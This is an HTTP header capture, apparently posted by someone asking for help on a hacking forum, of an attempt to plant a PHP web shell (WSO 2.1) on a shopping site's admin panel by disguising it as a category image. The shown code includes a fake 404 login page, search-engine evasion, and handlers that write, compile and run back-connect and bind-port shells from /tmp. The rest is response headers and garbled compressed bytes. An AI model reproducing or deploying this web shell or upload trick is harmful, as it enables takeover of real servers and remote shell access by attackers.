LiveHTTPheaders

POST /admin/categories?rid=63&type=Edit&play=save&page= HTTP/1.1

Host: www.*********.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=

Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892

Content-Type: multipart/form-data; boundary=---------------------------1966138998259963822131653635

Content-Length: 74857


-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_name_1"


Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="meta_keywords_1"


Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="meta_description_1"


Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_description_1"


<p>Cloth Dryers</p>

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="parent_id"


43

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_image"; filename="W5h311Oculta.php.jpg"

Content-Type: image/jpeg


<?php
/* WSO 2.1 (Web Shell by pgems.in) */
/*Subhashdasyam.com*/
/*$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";*/
/*pass antigua=HACKED*/
/*lo cambie por **********/
$auth_pass = "*********";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

<----------CORTE EL CODIGO DE LA WEB SHELL---------------->
***********************************************************
***********************************************************
******************POR MOTIVOS DEL TAMAÑO DEL POST**********
***********************************************************
***********************************************************
<----------CORTE EL CODIGO DE LA WEB SHELL---------------->

    Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
    </form>

    <?php
    if(isset($_POST['p1'])) {
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $out = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
        }
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
        }
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $out = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
        }
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
        }
    }
    echo '</div>';
    printFooter();
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
?>
<div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r*  - SubhashDasyam.com</marquee></div>
 </marquee></div>


-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="prev_image"


W5h311Oculta.php_63.jpg

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="keyword"


_1345005537

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="column"


1

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="status"


1

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="sort_order"


1

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="filter[p]"


p

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="sort[p]"


0

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="filter[m]"


m

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="sort[m]"


0

-----------------------------1966138998259963822131653635--

HTTP/1.1 302 Moved Temporarily   <<<-----------------------------  ESTE ES LO QUE NO ME DEJA SUBIR LA SHELL????????????

Date: Sat, 25 Aug 2012 15:36:43 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Location: /admin/categories?page=&msg=selected categories modified successfully!!

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 20

Keep-Alive: timeout=2, max=100

Connection: Keep-Alive

Content-Type: text/html


....................GET /admin/categories?page=&msg=selected%20categories%20modified%20successfully!! HTTP/1.1

Host: www.*********.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=

Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892


HTTP/1.1 200 OK

Date: Sat, 25 Aug 2012 15:36:49 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 5250

Keep-Alive: timeout=2, max=99

Connection: Keep-Alive

Content-Type: text/html


...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
.....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
.D.........?.D.....by
......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
_.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
.M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
.....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
....$v6#....h..?..`l..Wg
..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S.......^[.40\C.c.~LF.......a.Ig:,d.L1...Ky_..D..l`.......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]..\.T...M.@..M./......D....n.M.....]......l..k-B...:W1....t..`./'.).u..m..1^;..B.3*mQ;.86.
.j4=..>..R.%5.S.s.d..C3...1.(TiT'....U.....=...3....RF.Vp.o..1......o....Z...j..h..U.G..S..T-1p3..dt(.......^*...........(!.<.{x$....s....yi...(.5.....yjh^;Q.K.......@.....[.....H&..H..S..4....7%.}..,...X/....,......qOC:.
....>6..D.XU.B.p.gk..NG....D.)f...8F...pG.Y@...:U.{..".&..&`...E
#..j......q^...x.H...D.....X>.rcM.........=...)!...R....E.j..@.&5(.4....):..P9.#Q.L..n..x.;..Z(...X...........T..Q.U..%.we...<eE............F.&....?..z.Iu......U..5U..t.r...D`..b@..........6.nw/................A...5.i......]._..B.=..C.$....A./X%./.{t.N.bq...1...
.O.z2.% ...:.x.6....A...3.)...<].......Kv3...<b......";..[.-..\0...H..gQ..[.s...p.n...BYq]j9.B.e...).N.N7.....X.99.n..<z.0ctp.....($...Ke..o.JV:....23...#...Z
A3.K..;>...F....a.....J.
....%.......u..x....[..T..(l"..(.j........H.:.
.kf...-0..FL..>c.@........g.....i...T.6>..O...$4....5..P..K..'=_Ob.5.I_."..p...y....E..6.d...  S..;.$...} X;AM8..M...l.8+....eC.......aE...&]4.....wK.Z`.i........&......c....eZ.ZVj.wT..yn...jG......;....Z......h[..D..As:q=Q.....
..Q..Y.-...>...2y.......5<.....$._1....9.._..N....w.......;..0~..+.cx.gz.P.H..6.T..a..2..d......Y. .`..O..8.{p..HD.m..7.....=.";..'.f..;...7.b^N...2....;.B.$...6..7P...Z..z.......0..s..Y[9.....x...3...kxB.n`.."w;.]..0.(......V@..G....<..PnN.....k....aFA.!.U.iE-..ZPQ.H...I...../...Iy.R..4.$.mY.......b.~......p^h..`....}....yo...ar...Ab-.*.y..R#./..........g...#..{.tr:.s..^......Y..|..#....P...'4^;!...'..M=..jJ.Ht_.....kp&.fa...)v.~.[.......>...u..>..9..-.]....c-.'.f5.Nn..Y......*..T.a-Us...S;.?.......7...A"O.\Z..n(.t...n........(F....g>...^0...&P|I>q .....s......S..Z.nx.+...G.......M...}......
.~...o.WUD..u.Z-.w..3caR:.&.......{A.P;..G..qx..[<V.Q<*......&..4.=....d...y(;jQVUDQ........Xn......B.m.......i.Kr}..Ay.<P....*..T..Z...>.K96.$.i,.N...i......)...k).....G........4.....@.E`U.E ...VQ4.~3'?....r..l..B...=.....T..S..8.E\U.E\n.$.l..N...(....0.
G.].+..y...y.Z.Ke..&..........ts....xP.6.....|..)...5....<.."
........f...|I^S6+Fk.+FkY1.E...Q...E.<.>.,.... (...5......."
....$.\.?.,_P.P.M.Q.G.Q[.Le..*.:.w..a..y..&.D.6.D..$..".....d.\-C.|..V.x.TW(.J.6.J..T.."
M.$..F.i\.3.P5....1j..QSYDQ.sx.......|.3o..O..ID:..S...M.Q.G.Q[.Me..$.......2.9.Y.+...x....j.5...;.4..y4.UmqWUDq......q.e....
.P6.Fm..Fm.4.E...;...).)@...No...#..9#...J..........F.+.(.s^P.Js. Y.>....o"P.;....G..hF.....[4.E...D...7..i.7.M..4..:h...E.O9.'.C.
_....my.^.5o....*.(...\......l..<..:.."
....$..@..y7.;*..Pi.S..._.-........{...3..mY.M..&..v.>..X&>.d.6.5|...%..h.....|.'.@....*o.l..D.
...I>.
.[............1...*.Gs;<...m }...'7....!V{..@..F-.!p.....zLK=..SV&...,J;.,.....H.K/,O.T....S.E[.r..c.....<..jrL2..,,aDv.f....D^.....'.....z.!......m....<.U.....e&........5kI.U.....K.....G.....n......,...f>..^CK....<.......n..q.#J..D...........0.9... .
{...u=eK....A........C..A_...#....7......L..I...x...@Gc..t3I......3...)d:5.I.+..D.K.....["....#............M ....[B.>.H.....+r.[4.....L*....C;B.A...`.>..}.wp..S.)..ko.._\.6....ty3.~...J.+...|Y.A..1.:../4...Io.-H^....P...Z.HS.....!Fu....GET /admin/images/thickbox/loadingAnimation.gif HTTP/1.1

Host: www.*********.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24

Accept: image/png,image/*;q=0.8,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://www.*********.com/admin/categories?page=&msg=selected%20categories%20modified%20successfully!!

Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892


HTTP/1.1 404 Not Found

Date: Sat, 25 Aug 2012 15:36:51 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 3330

Keep-Alive: timeout=2, max=98

Connection: Keep-Alive

Content-Type: text/html


...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
.....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
.D.........?.D.....by
......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
_.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
.M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
.....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
....$v6#....h..?..`l..Wg
..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S...9.5...l.....,
..P...........`,d.L1...Fy_H.D..l`D......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]....T...M.@..M./......D....A.. 6
...:h)....>..Z....u.bx.C..v..(_^..6...;c.v<...gT..v*pl8.X.hz..}H...Kj|."...\T.f.1.c.P...NF......?.;{ ..f.5.q..6..T...c.)..nG...+t.p...>-..g.`....<..Zb.f....P...Aw...T\)v.-....5<QB&y...HRE=)...\....%|Q.k.g=......v...b7%.9....c....D.5.5.L.
....r.i..M.oJb.6$Y,.C.^.zA
Y..M..g...t....9.}.n.....Z.f.D..@e....cY..S.<Z.q.........b..u....7E.M.WM..
...F....]%.......G........7....|....&....=#..{z.+RB......Pa.......MjPviX...St.?.r.G.......u..wdG.P..M.j....u5.s.........=J....#.y...q9!....?..mO.0.._.-...;PO=..#...K4......] ..@.=...L............)......R........._...k-.(R....R.91.#........M;.bV9(...U..,..5..I....q.?..[...f.k")..d6..LB...y._3...F.Q.._y......n.N.`...(D.B9.b..h.5...>.2..s.s....]-..&4%..x.w].'...6k.l..!cL.Rp.k.}.Nu[..c..{1...n.J#......m..)4...nx*u.J....2..`..a-mp..R..;h.H2........:..m...]....j.......d.9;..]7...!...wL...u..._......B..>MZl.H...p.\..6-.Lz..zp...^......)..........!N.....l@..@R....+. .......O.R+F...W.
.G.......t...Wb..$D..f4.h!.zK.. .M......)]..............@......$ #&.,V=.........j...!.h....yR&.!..C.|Up....b....&.O.....0...|.ng?u|K.R.
..G.?...W.7.....(....v`..'.'...../........8..